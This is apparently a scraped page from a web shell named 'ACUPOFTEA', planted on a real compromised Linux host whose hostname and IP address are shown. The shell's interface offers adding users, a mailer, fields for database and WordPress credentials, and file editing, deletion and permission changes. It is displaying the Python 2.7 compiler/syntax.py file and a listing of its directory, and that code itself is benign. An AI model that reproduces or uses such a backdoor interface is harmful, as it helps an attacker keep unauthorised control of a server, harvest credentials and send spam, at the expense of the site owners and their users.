System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python2.7
/
compiler
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
syntax.py
"""Check for errs in the AST. The Python parser does not catch all syntax errors. Others, like assignments with invalid targets, are caught in the code generation phase. The compiler package catches some errors in the transformer module. But it seems clearer to write checkers that use the AST to detect errors. """ from compiler import ast, walk def check(tree, multi=None): v = SyntaxErrorChecker(multi) walk(tree, v) return v.errors class SyntaxErrorChecker: """A visitor to find syntax errors in the AST.""" def __init__(self, multi=None): """Create new visitor object. If optional argument multi is not None, then print messages for each error rather than raising a SyntaxError for the first. """ self.multi = multi self.errors = 0 def error(self, node, msg): self.errors = self.errors + 1 if self.multi is not None: print "%s:%s: %s" % (node.filename, node.lineno, msg) else: raise SyntaxError, "%s (%s:%s)" % (msg, node.filename, node.lineno) def visitAssign(self, node): # the transformer module handles many of these pass ## for target in node.nodes: ## if isinstance(target, ast.AssList): ## if target.lineno is None: ## target.lineno = node.lineno ## self.error(target, "can't assign to list comprehension")
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
..
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
__init__.py
text/x-python
1023 B
-rw-r--r--
2024-04-10 04:58:35
__init__.pyc
application/octet-stream
1.27 KB
-rw-r--r--
2024-04-10 04:58:46
__init__.pyo
application/octet-stream
1.27 KB
-rw-r--r--
2024-04-10 04:58:46
ast.py
text/x-python
36.63 KB
-rw-r--r--
2024-04-10 04:58:35
ast.pyc
application/octet-stream
70.43 KB
-rw-r--r--
2024-04-10 04:58:46
ast.pyo
application/octet-stream
70.43 KB
-rw-r--r--
2024-04-10 04:58:46
consts.py
text/plain
468 B
-rw-r--r--
2024-04-10 04:58:35
consts.pyc
application/octet-stream
737 B
-rw-r--r--
2024-04-10 04:58:46
consts.pyo
application/octet-stream
737 B
-rw-r--r--
2024-04-10 04:58:46
future.py
text/x-python
1.85 KB
-rw-r--r--
2024-04-10 04:58:35
future.pyc
application/octet-stream
2.89 KB
-rw-r--r--
2024-04-10 04:58:46
future.pyo
application/octet-stream
2.89 KB
-rw-r--r--
2024-04-10 04:58:46
misc.py
text/x-python
1.75 KB
-rw-r--r--
2024-04-10 04:58:35
misc.pyc
application/octet-stream
3.65 KB
-rw-r--r--
2024-04-10 04:58:46
misc.pyo
application/octet-stream
3.65 KB
-rw-r--r--
2024-04-10 04:58:46
pyassem.py
text/x-python
23.7 KB
-rw-r--r--
2024-04-10 04:58:35
pyassem.pyc
application/octet-stream
25.34 KB
-rw-r--r--
2024-04-10 04:58:46
pyassem.pyo
application/octet-stream
24.78 KB
-rw-r--r--
2024-04-10 04:58:43
pycodegen.py
text/x-python
46.69 KB
-rw-r--r--
2024-04-10 04:58:35
pycodegen.pyc
application/octet-stream
55.19 KB
-rw-r--r--
2024-04-10 04:58:46
pycodegen.pyo
application/octet-stream
54.76 KB
-rw-r--r--
2024-04-10 04:58:43
symbols.py
text/x-python
14.15 KB
-rw-r--r--
2024-04-10 04:58:35
symbols.pyc
application/octet-stream
17.26 KB
-rw-r--r--
2024-04-10 04:58:46
symbols.pyo
application/octet-stream
17.23 KB
-rw-r--r--
2024-04-10 04:58:43
syntax.py
text/x-python
1.41 KB
-rw-r--r--
2024-04-10 04:58:35
syntax.pyc
application/octet-stream
1.84 KB
-rw-r--r--
2024-04-10 04:58:46
syntax.pyo
application/octet-stream
1.84 KB
-rw-r--r--
2024-04-10 04:58:46
transformer.py
text/x-python
51.87 KB
-rw-r--r--
2024-04-10 04:58:35
transformer.pyc
application/octet-stream
46.53 KB
-rw-r--r--
2024-04-10 04:58:46
transformer.pyo
application/octet-stream
44.76 KB
-rw-r--r--
2024-04-10 04:58:43
visitor.py
text/x-python
3.8 KB
-rw-r--r--
2024-04-10 04:58:35
visitor.pyc
application/octet-stream
4.09 KB
-rw-r--r--
2024-04-10 04:58:46
visitor.pyo
application/octet-stream
4.09 KB
-rw-r--r--
2024-04-10 04:58:46
~ ACUPOFTEA - mail.ontime-ae.com